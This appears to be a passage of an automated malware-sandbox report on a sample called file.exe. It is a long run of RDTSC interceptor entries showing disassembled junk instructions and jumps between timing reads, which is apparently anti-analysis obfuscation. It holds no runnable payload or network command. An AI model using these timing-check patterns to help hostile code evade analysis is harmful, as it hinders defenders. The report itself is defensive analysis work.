Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FDB7A second address: 13FDB80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FDCEF second address: 13FDD17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 je 00007FFAE9061D66h 0x0000000b jbe 00007FFAE9061D66h 0x00000011 push eax 0x00000012 pop eax 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b push esi 0x0000001c pop esi 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 jne 00007FFAE9061D68h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FDD17 second address: 13FDD42 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 jmp 00007FFAE903A975h 0x0000000e jmp 00007FFAE903A96Bh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FDE7E second address: 13FDE8C instructions: 0x00000000 rdtsc 0x00000002 js 00007FFAE9061D68h 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FE264 second address: 13FE268 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FE268 second address: 13FE26E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FE26E second address: 13FE277 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FE277 second address: 13FE27F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 139EEF4 second address: 139EF0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAE903A977h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FE7D7 second address: 13FE7DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FD188 second address: 13FD18C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FD18C second address: 13FD199 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1402559 second address: 140255D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13B7F34 second address: 13B7F3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13B8440 second address: 13B8446 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13B8446 second address: 13B844A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13B844A second address: 1201A16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007FFAE903A968h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 mov edx, esi 0x00000027 push dword ptr [ebp+122D0C35h] 0x0000002d movsx ecx, ax 0x00000030 jmp 00007FFAE903A977h 0x00000035 call dword ptr [ebp+122D1926h] 0x0000003b pushad 0x0000003c add dword ptr [ebp+122D18A0h], edi 0x00000042 xor eax, eax 0x00000044 clc 0x00000045 mov edx, dword ptr [esp+28h] 0x00000049 cmc 0x0000004a mov dword ptr [ebp+122D2AF3h], eax 0x00000050 mov dword ptr [ebp+122D18A0h], eax 0x00000056 mov esi, 0000003Ch 0x0000005b or dword ptr [ebp+122D18A0h], ebx 0x00000061 add esi, dword ptr [esp+24h] 0x00000065 stc 0x00000066 lodsw 0x00000068 stc 0x00000069 add eax, dword ptr [esp+24h] 0x0000006d stc 0x0000006e mov ebx, dword ptr [esp+24h] 0x00000072 jmp 00007FFAE903A978h 0x00000077 push eax 0x00000078 push eax 0x00000079 push edx 0x0000007a push eax 0x0000007b push edx 0x0000007c pushad 0x0000007d popad 0x0000007e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13B8510 second address: 13B8515 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13B8515 second address: 13B851B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B851B second address: 13B853F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FFAE9061D78h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B86F0 second address: 13B86F9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B86F9 second address: 13B86FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8914 second address: 13B8918 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B89F3 second address: 13B89F8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B89F8 second address: 13B8A28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007FFAE903A972h 0x0000000d nop 0x0000000e mov cl, 95h 0x00000010 push 00000004h 0x00000012 xor dword ptr [ebp+122D1C0Dh], ecx 0x00000018 nop 0x00000019 pushad 0x0000001a pushad 0x0000001b jg 00007FFAE903A966h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8A28 second address: 13B8A35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007FFAE9061D66h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8A35 second address: 13B8A47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007FFAE903A968h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8E87 second address: 13B8E9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 mov dword ptr [esp], eax 0x00000009 or dl, 00000064h 0x0000000c push 0000001Eh 0x0000000e mov di, ax 0x00000011 nop 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 pop edi 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8E9E second address: 13B8EB8 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FFAE903A966h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007FFAE903A96Ch 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B91DE second address: 139EEF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jnc 00007FFAE9061D6Ch 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f xor cx, C104h 0x00000014 cmc 0x00000015 call dword ptr [ebp+122D22C0h] 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FFAE9061D74h 0x00000024 push ecx 0x00000025 pop ecx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140286D second address: 140288E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FFAE903A976h 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140288E second address: 14028CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAE9061D72h 0x00000007 pushad 0x00000008 js 00007FFAE9061D66h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jmp 00007FFAE9061D74h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b jp 00007FFAE9061D66h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14028CD second address: 14028D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1402CF4 second address: 1402CFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1402E39 second address: 1402E4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnl 00007FFAE903A966h 0x00000009 jnl 00007FFAE903A966h 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1402E4F second address: 1402E55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14032B3 second address: 14032D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FFAE903A966h 0x0000000a popad 0x0000000b jmp 00007FFAE903A96Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14032D0 second address: 14032E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAE9061D6Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14059F0 second address: 1405A14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAE903A979h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1405A14 second address: 1405A18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1405A18 second address: 1405A1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1405A1C second address: 1405A3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c jmp 00007FFAE9061D6Ch 0x00000011 pop ecx 0x00000012 jnl 00007FFAE9061D68h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1405A3D second address: 1405A48 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jg 00007FFAE903A966h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140E68D second address: 140E6AD instructions: 0x00000000 rdtsc 0x00000002 jc 00007FFAE9061D7Bh 0x00000008 push edx 0x00000009 pop edx 0x0000000a jmp 00007FFAE9061D73h 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8BF7 second address: 13B8BFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8EB4 second address: 13B8EB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140EF19 second address: 140EF23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140EF23 second address: 140EF2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140EF2B second address: 140EF37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140EF37 second address: 140EF3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140EF3B second address: 140EF58 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FFAE903A975h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1413BFA second address: 1413C20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FFAE9061D66h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FFAE9061D79h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1413C20 second address: 1413C4D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jno 00007FFAE903A966h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d je 00007FFAE903A966h 0x00000013 jne 00007FFAE903A966h 0x00000019 popad 0x0000001a popad 0x0000001b pushad 0x0000001c push ebx 0x0000001d push edx 0x0000001e pop edx 0x0000001f pop ebx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FFAE903A96Bh 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141312E second address: 1413136 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1413136 second address: 141315F instructions: 0x00000000 rdtsc 0x00000002 jns 00007FFAE903A966h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FFAE903A979h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141315F second address: 1413169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14132C7 second address: 14132CC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14132CC second address: 14132D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14132D2 second address: 14132F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FFAE903A972h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jne 00007FFAE903A968h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14132F8 second address: 14132FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14132FC second address: 141332B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FFAE903A96Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FFAE903A979h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1413616 second address: 1413624 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1416DF2 second address: 1416E37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAE903A976h 0x00000007 pushad 0x00000008 js 00007FFAE903A966h 0x0000000e jnl 00007FFAE903A966h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FFAE903A979h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1416E37 second address: 1416E71 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FFAE9061D7Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FFAE9061D75h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1416E71 second address: 1416E75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14163D7 second address: 14163F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FFAE9061D70h 0x0000000a jng 00007FFAE9061D68h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141658C second address: 14165A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAE903A96Ah 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007FFAE903A966h 0x00000012 jns 00007FFAE903A966h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14165A9 second address: 14165C6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FFAE9061D71h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14165C6 second address: 14165E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAE903A976h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1416745 second address: 1416749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1416749 second address: 1416780 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FFAE903A966h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007FFAE903A982h 0x00000013 jp 00007FFAE903A97Bh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1416780 second address: 1416793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAE9061D6Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1368D69 second address: 1368D74 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1368D74 second address: 1368DA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAE9061D75h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007FFAE9061D72h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1419F72 second address: 1419F76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141F979 second address: 141F97D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141FC41 second address: 141FC45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141FC45 second address: 141FC49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142028E second address: 1420292 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1420549 second address: 1420555 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jp 00007FFAE9061D66h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1420555 second address: 1420570 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAE903A977h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1420570 second address: 1420588 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b jne 00007FFAE9061D66h 0x00000011 pop ecx 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 push esi 0x00000016 pop esi 0x00000017 pop edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142083C second address: 1420875 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jns 00007FFAE903A966h 0x0000000d pop eax 0x0000000e push esi 0x0000000f jmp 00007FFAE903A974h 0x00000014 pop esi 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jc 00007FFAE903A966h 0x0000001f push edi 0x00000020 pop edi 0x00000021 push esi 0x00000022 pop esi 0x00000023 jbe 00007FFAE903A966h 0x00000029 popad 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1420B70 second address: 1420B91 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FFAE9061D7Ch 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1420B91 second address: 1420B97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14213C7 second address: 14213D1 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FFAE9061D66h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14292A3 second address: 14292BF instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FFAE903A966h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FFAE903A970h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142940C second address: 1429411 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
